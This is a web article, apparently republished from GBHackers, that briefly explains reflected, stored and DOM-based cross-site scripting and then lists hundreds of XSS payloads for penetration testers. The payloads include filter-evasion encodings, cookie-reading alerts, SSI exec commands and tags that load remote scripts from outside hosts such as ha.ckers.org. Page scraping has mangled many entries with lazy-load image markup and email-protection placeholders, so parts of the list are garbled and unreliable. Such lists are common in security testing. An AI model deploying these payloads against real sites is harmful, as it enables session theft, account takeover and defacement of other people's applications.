Hacking, Hacking Tools, Vulnerability

Top 500 Most Important XSS Script Cheat Sheet for Web Application Penetration Testing

XSS Cheat Sheet

XSS is a very commonly exploited vulnerability type which is very widely spread and easily detectable. Here we are going to see about most important XSS Cheat sheet.

What is XSS(Cross Site Scripting)? An attacker can inject untrusted snippets of JavaScript into your application without validation. This JavaScript is then executed by the victim who is visiting the target site. XSS classified into three types and these XSS Cheat Sheet will help to find the XSS vulnerabilities for Pentesters.

  • Reflected XSS
  • Stored XSS
  • DOM-Based XSS

XSS Cheat Sheet

  • In Reflected XSS, an attacker sends the victim a link to the target application through email, social media, etc. This link has a script embedded within it which executes when visiting the target site.
  • In Stored XSS, the attacker is able to plant a persistent script in the target website which will execute when anyone visits it.
  • With DOM Based XSS, no HTTP request is required, the script is injected as a result of modifying the DOM of the target site in the client side code in the victim’s browser and is then executed.

Most Important XSS Cheat Sheet

<body oninput=javascript:alert(1)><input autofocus>
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
<table background="javascript:javascript:alert(1)">
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
<![><img src="]><img src=x onerror=javascript:alert(1)//">
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
<li style=list-style:url() onerror=javascript:alert(1)> 
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> javascript:alert(1) alert(1)0
document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;
x javascript:alert(1)"> javascript:alert(1)"> javascript:alert(1)"> javascript:alert(1)'>"> javascript:alert(1)"> javascript:alert(1)">
d.innerHTML=d.innerHTML XXX javascript:alert(1)"` `> <a href="http://foo.bar/#x=`y"></a><img><img src="https://professionalhackers.in/wp-content/plugins/jetpack/modules/lazy-images/images/1x1.trans.gif" data-lazy-src="x" class=" jetpack-lazy-image"><noscript><img src="x"></noscript></a>"> <!--[if]>javascript:alert(1)</script --> <!--[if<img src="https://professionalhackers.in/wp-content/plugins/jetpack/modules/lazy-images/images/1x1.trans.gif" data-lazy-src="x" class=" jetpack-lazy-image"><noscript><img src="x"></noscript> --> <a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d <style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> <style>*[{}@import'%(css)s?]</style>X <div style="font-family:'foo;color:red;'">XXX <div>XXX *{x:expression(javascript:alert(1))} <div></div> <div>X <div id="d"><div>X</div></div> with(document.getElementById("d"))innerHTML=innerHTML <div>X <div>X <div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> <x style="background:url('x&#1;;color:red;/*')">XXX</x> ({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval ({0:#0=eval/#0#/#0#(javascript:alert(1))}) ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')() <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi <meta charset="x-imap4-modified-utf7">&alert&A7&(1)&R&UA;&& ¼script¾javascript:alert(1)¼/script¾ X 1 </pre><pre> <IMG SRC="alert('XSS');"> perl -e 'print "<IMG>";' > out <IMG SRC="alert('XSS');"> <BODY onload!#$%&()*~+-_.,:;<a href="https://gbhackers.com/cdn-cgi/l/email-protection" class="__cf_email__">[email protected]</a>[/|\]^`=alert("XSS")> <alert("XSS");// <img SRC="alert('XSS')" src="https://professionalhackers.in/wp-content/plugins/jetpack/modules/lazy-images/images/1x1.trans.gif" data-lazy-src="http://ha.ckers.org/scriptlet.html" class=" jetpack-lazy-image"><noscript><IMG SRC="alert('XSS')" src="http://ha.ckers.org/scriptlet.html"></noscript>alert("XSS"); <IMG> <IMG> li {list-style-image: url("javascript:alert('XSS')");}<UL><LI>XSS</br> <IMG SRC='msgbox("XSS")'> <IMG SRC="[code]"> <BR> @import'http://ha.ckers.org/xss.css'; ; REL=stylesheet"> BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")} @im\port'\ja\vasc\ript:alert("XSS")'; <IMG> exp/*<A> alert('XSS'); .XSS{background-image:url("javascript:alert('XSS')");}<A CLASS="XSS"></A> BODY{background:url("javascript:alert('XSS')")} BODY{background:url("javascript:alert('XSS')")} ¼script¾alert(¢XSS¢)¼/script¾ <TABLE> <TABLE><TD> <DIV> <DIV> <DIV> <DIV> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV="Set-Cookie" Content="USERID=alert('XSS')"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- " SRC="http://ha.ckers.org/xss.js"> " SRC="http://ha.ckers.org/xss.js"> " '' SRC="http://ha.ckers.org/xss.js"> '" SRC="http://ha.ckers.org/xss.js"> ` SRC="http://ha.ckers.org/xss.js"> '>" SRC="http://ha.ckers.org/xss.js"> document.write("PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="htt p://6 6.000146.0x7.147/">XSS</A> {font-family:'' alert(1) {Opera} <img> prompt(1) /**/alert(1)/**/<h1> "> <form><a href="\u0061lert(1)">X <img> <img src="https://professionalhackers.in/wp-content/plugins/jetpack/modules/lazy-images/images/1x1.trans.gif" data-lazy-src="`~`" class=" jetpack-lazy-image"><noscript><img src="`~`"></noscript> <form> <a href="application/x-x509-user-cert; base64 ,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">X</a>alert(document.location)XYZ</a>[email protected]</a> onerror = prompt('1') <pre> alert(String.fromCharCode(49))/**/alert(document.location)/**/ <form><textarea> /***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/ <a href="void(0)">X</a> alert(0%0) <span>SPAN <img>{-o-link-source:'' OnMouseOver {Firefox & Opera} ^__^ <div>X</div> {IE7} // /*iframe/src*/[email protected]</a>"/onload=prompt(1) /*iframe/src*/> //|\\ //|\\ /{src:''</font>/ <a> ''alert(1) {Opera} <a href="javascript:\u0061l&#101%72t(1)"><button> <div>DIV</div> <a href="jAvAsCrIpT:alert(1)">X</a> <var>On Mouse Over</var> <a href="javascript:alert(document.cookie)">Click Here</a> <img src="https://professionalhackers.in/wp-content/plugins/jetpack/modules/lazy-images/images/1x1.trans.gif" data-lazy-src="/" class=" jetpack-lazy-image"><noscript><img src="/"></noscript> alert(1); X</div> <img src="https://professionalhackers.in/wp-content/plugins/jetpack/modules/lazy-images/images/1x1.trans.gif" data-lazy-src="xx`onerror=alert(1)" class=" jetpack-lazy-image"><noscript><img src="xx`onerror=alert(1)"></noscript> <a>click MsgBox+1 <a>">X</a> ~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061') +-+-1-+-+alert(1) alert(1)> /*// confirm(1); alert(1) <a href="&#97lert(1)">ClickMe alert(1) style="x:"> --!> <div style="width:100%;height:100%">x</button> "><img src="https://professionalhackers.in/wp-content/plugins/jetpack/modules/lazy-images/images/1x1.trans.gif" data-lazy-src="x" class=" jetpack-lazy-image"><noscript><img src="x"></noscript> <form><button>CLICKME <a>click <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> '';!--"<XSS>=&{()} '>//\\,<'>">">"*" '); alert('XSS alert(1); alert('XSS'); <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert(&quot;XSS&quot;)> <IMG """>alert("XSS")"> <script>alert('XSS');ipt> alert(String.fromCharCode(88,83,83)) <img src=foo.png onerror=alert(/xssed/) /> <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> <marquee>alert('XSS')</marquee> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> ">alert(0) </title>alert(/xss/) </textarea>alert(/xss/) <IMG LOWSRC=\"javascript:alert('XSS')\"> <IMG DYNSRC=\"javascript:alert('XSS')\"> <font style='color:expression(alert(document.cookie))'> <img src="javascript:alert('XSS')"> alert('XSS') </pre><pre> <body onunload="javascript:alert('XSS');"> <body onLoad="alert('XSS');" [color=red' onmouseover="alert('xss')"]mouse over[/color] "/></a></><img src=1.gif onerror=alert(1)> window.alert("Bonjour !"); <div style="x:expression((window.r==1)?'':eval('r=1; alert(String.fromCharCode(88,83,83));'))"> onload=alert('XSS')> "> '>><h1>XSS</h1> '">>alert('XSS') '">><marquee><h1>XSS</h1></marquee> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"> var var = 1; alert(var) <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <?='alert("XSS")'?> <IMG SRC='vbscript:msgbox(\"XSS\")'> " onfocus=alert(document.domain) "> <" <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET> <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out <br size=\"&{alert('XSS')}\"> <scrscriptipt>alert(1)</scrscriptipt> </br style=a:expression(alert())> </script>alert(1) "><BODY onload!#$%&()*~+-_.,:;<a href="https://gbhackers.com/cdn-cgi/l/email-protection" class="__cf_email__">[email protected]</a>[/|\]^`=alert("XSS")> [color=red width=expression(alert(123))][color] <BASE HREF="javascript:alert('XSS');//"> Execute(MsgBox(chr(88)&chr(83)&chr(83)))< "></iframe>alert(123) <body onLoad="while(true) alert('XSS');"> '"></title>alert(1111) </textarea>'">alert(document.cookie) '""> alert('X \nS \nS'); </script></script><<<>>>alert(123) <html><noalert><noscript>(123)</noscript>(123) <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> '></select>alert(123) '>"> }</style>a=eval;b=alert;a(b(/XSS/.source)); document.write("XSS"); a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d); ='>alert("xss") "+src="http://yoursite.com/xss.js?69,69"> <body background=javascript:'">alert(navigator.userAgent)></body> ">/XaDoS/>alert(document.cookie) ">/KinG-InFeT.NeT/>alert(document.cookie) src="http://www.site.com/XSS.js"></script> data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4= !--" />alert('xss'); alert("XSS by \nxss")<marquee><h1>XSS by xss</h1></marquee> ">alert("XSS by \nxss")><marquee><h1>XSS by xss</h1></marquee> '"></title>alert("XSS by \nxss")><marquee><h1>XSS by xss</h1></marquee> <img """>alert("XSS by \nxss")<marquee><h1>XSS by xss</h1></marquee> alert(1337)<marquee><h1>XSS by xss</h1></marquee> ">alert(1337)">alert("XSS by \nxss</h1> '">alert(1337)><marquee><h1>XSS by xss</h1></marquee> <marquee><h1>XSS by xss</h1></marquee> '>alert(String.fromCharCode(88,83,83))<img src="" alt=' ">alert(String.fromCharCode(88,83,83))<img src="" alt=" \'>alert(String.fromCharCode(88,83,83))<img src="" alt=\' http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS?? http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS?? '); alert('xss'); var x=' \\'); alert(\'xss\');var x=\' //--></SCRIPT>alert(String.fromCharCode(88,83,83)); >">alert(561177485777)%3B <img src="Mario Heiderich says that svg SHOULD not be executed trough image tags" onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"></img> </body> </html> alert(“XSS”); <BODY ONLOAD=alert("XSS")> <BODY BACKGROUND="javascript:alert('XSS')"> <IMG SRC="javascript:alert('XSS');"> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')">
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'>alert(String.fromCharCode(88,83,83)) '';!--"<XSS>=&{()} alert('XSS') alert(String.fromCharCode(88,83,83)) <BASE HREF="javascript:alert('XSS');//"> <BGSOUND SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS');"> <BODY ONLOAD=alert('XSS')> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));">
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E










































































 ">

">123</h1> "><h1>123</h1> "><h1>123</h1> "></iframe>alert(`TEXT YOU WANT TO BE DISPLAYED`);

123

">

123

>

Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250 "><h1>">123</h1> "><h1>123</h1> <iframe src="&Tab;javascript:prompt(1)&Tab;"> <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" <sVg><scRipt >alert&lpar;1&rpar; {Opera} <img/src=`` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript&colon;confirm(1)" <img src=``&NewLine; onerror=alert(1)&NewLine;

Source : GBHackers

Previous ArticleNext Article
Founder and Editor-in-Chief of 'Professional Hackers India'. Technology Evangelist, Security Analyst, Cyber Security Expert, PHP Developer and Part time hacker.

Send this to a friend